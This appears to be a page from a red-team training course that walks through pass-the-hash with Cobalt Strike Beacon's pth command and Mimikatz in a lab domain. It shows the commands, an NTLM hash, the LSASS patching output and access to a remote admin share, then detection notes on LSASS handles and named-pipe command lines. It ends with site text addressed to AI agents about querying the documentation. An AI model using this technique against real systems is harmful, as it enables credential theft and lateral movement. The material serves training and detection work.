# Pass the Hash Pass the hash is a technique that allows you to authenticate to a Windows service using the NTLM hash of a user's password. It works by starting a new logon session with a fake identity and then replacing the session information with the domain, username and NTLM hash provided. Beacon has a dedicated `pth` command which executes Mimikatz in the background. This command requires elevated privileges. \\ First, attempt to list the C$ share of the WEB machine - this will fail because bfarmer is not a local admin there. ``` beacon> getuid [*] You are DEV\bfarmer (admin) beacon> ls \\web.dev.cyberbotic.io\c$ [-] could not open \\web.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED ``` \\ Then run the `pth` command with jking's username and NTLM hash. ``` beacon> pth DEV\jking 59fc0f884922b4ce376051134c71e22c user : jking domain : DEV program : C:\Windows\system32\cmd.exe /c echo 71fb38e2d65 > \\.\pipe\675b08 impers. : no NTLM : 59fc0f884922b4ce376051134c71e22c | PID 1932 | TID 6600 | LSA Process is now R/W | LUID 0 ; 7479840 (00000000:00722220) \_ msv1_0 - data copy @ 000001F6344B3D20 : OK ! \_ kerberos - data copy @ 000001F6345BD7C8    \_ aes256_hmac       -> null                \_ aes128_hmac       -> null                \_ rc4_hmac_nt       OK    \_ rc4_hmac_old      OK    \_ rc4_md4           OK    \_ rc4_hmac_nt_exp   OK    \_ rc4_hmac_old_exp  OK \_ *Password replace @ 000001F6344C6128 (32) -> null ``` \\ We can see that the command Mimiktaz runs passes the new credentials over a named pipe, which Beacon then impersonates automatically. We can then attempt to list the C$ share again, which will succeed. ``` beacon> ls \\web.dev.cyberbotic.io\c$ [*] Listing: \\web.dev.cyberbotic.io\c$\ Size Type Last Modified Name ---- ---- ------------- ---- dir 08/15/2022 18:50:13 $Recycle.Bin dir 08/10/2022 04:55:17 $WinREAgent dir 08/10/2022 05:05:53 Boot dir 08/18/2021 23:34:55 Documents and Settings dir 08/19/2021 06:24:49 EFI dir 08/15/2022 18:58:09 inetpub dir 05/08/2021 08:20:24 PerfLogs dir 08/24/2022 11:02:25 Program Files dir 08/10/2022 04:06:16 Program Files (x86) dir 08/31/2022 17:40:32 ProgramData dir 08/15/2022 18:31:08 Recovery dir 08/30/2022 11:16:24 System Volume Information dir 08/30/2022 17:51:08 Users dir 08/30/2022 20:19:27 Windows 427kb fil 08/10/2022 05:00:07 bootmgr 1b fil 05/08/2021 08:14:33 BOOTNXT 12kb fil 09/01/2022 07:26:41 DumpStack.log.tmp 384mb fil 09/01/2022 07:26:41 pagefile.sys ``` \\ To "drop" impersonation afterwards, use the `rev2self` command. ``` beacon> rev2self [*] Tasked beacon to revert token beacon> ls \\web.dev.cyberbotic.io\c$ [-] could not open \\web.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED ``` \\ **OPSEC**\ \ Two opportunities to detect PTH are the R/W handle to LSASS; and looking for the `echo foo > \\.\pipe\bar` pattern in command-line logs. \\ The former is already part of the "Suspicious Handle to LSASS" saved search. This time we see an access mask of 0x1038. This is a combination of PROCESS\_QUERY\_LIMITED\_INFORMATION (0x1000), PROCESS\_VM\_WRITE (0x0020), PROCESS\_VM\_READ (0x0010) and PROCESS\_VM\_OPERATION (0x0008). \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/074/46d/801/lsass-rw.png) \\ The latter can be found via the "Suspicious Named Pipe Impersonation" search, which queries process events where the arguments contain "echo", ">" and "\\\\.\pipe\\". \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/11f/d79/42f/named-pipe.png) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yamortsa.gitbook.io/rto/user-impersonation/pass-the-hash.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.